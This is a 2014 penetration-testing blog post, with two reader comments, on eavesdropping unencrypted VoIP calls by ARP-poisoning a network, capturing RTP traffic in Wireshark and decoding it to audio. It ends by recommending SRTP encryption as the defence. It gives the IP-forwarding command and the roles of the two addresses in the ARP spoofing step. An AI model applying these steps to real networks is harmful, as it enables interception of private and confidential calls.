Eavesdropping VoIP Calls With Wireshark

22 Jul

VoIP phones are implemented in every major organization and they are providing an attack surface for every malicious user that’s knows the basics of hacking. If there is no encryption in the communication media then an attacker could eavesdrop phone conversations which might impact the business in case that calls are classified as confidential.

A pentester should be able to identify if eavesdropping is possible on the voice network via the following technique.

ARP Poisoning

The first step before implementing a Man-in-the-Middle attack is to enable IP forwarding in order to be able to route traffic from your system to the gateway with the following command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Now you can perform a Man-in-the-Middle attack in order to be able to intercept VoIP traffic. This can be achieved really easy with the command below:

MiTM attack

MiTM attack

Capturing and Decoding VoIP Traffic

Now that the traffic is being routed to your box you can use Wireshark in order to sniff any SIP traffic. We are particularly interested for the RTP packets as they contain the actual conversation of a VoIP call.

RTP Traffic

RTP Traffic


Wireshark contains a built-in utility called VoIP calls which can decode RTP data into a playable audio format.

Decoding RTP Traffic-Wireshark

Decoding RTP Traffic-Wireshark



As we saw it is very easy and fast to eavesdrop a phone call conversation just by performing a MiTM attack and having a tool like wireshark to sniff the traffic. In a VoIP assessments pentesters should try to implement this attack in order to identify if eavesdropping is possible. To prevent this attack companies should use the SRTP which is a secure protocol and provides encryption of the data being transferred so even if an attacker is able to capture the call it will be difficult to decrypt the data and to listen the message.


Posted by on July 22, 2014 in VoIP


Tags: , ,

2 responses to “Eavesdropping VoIP Calls With Wireshark

  1. jamieduk

    September 20, 2016 at 2:45 pm

    the 2 ip’s in arpsnoop command can you explain what the ip’s represent is the 1st ip the sip server and the 2nd ip the sip client ip? please reply.

    • netbiosX

      September 20, 2016 at 2:59 pm

      The first IP is the local IP and the second IP is the IP of the gateway in the network.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: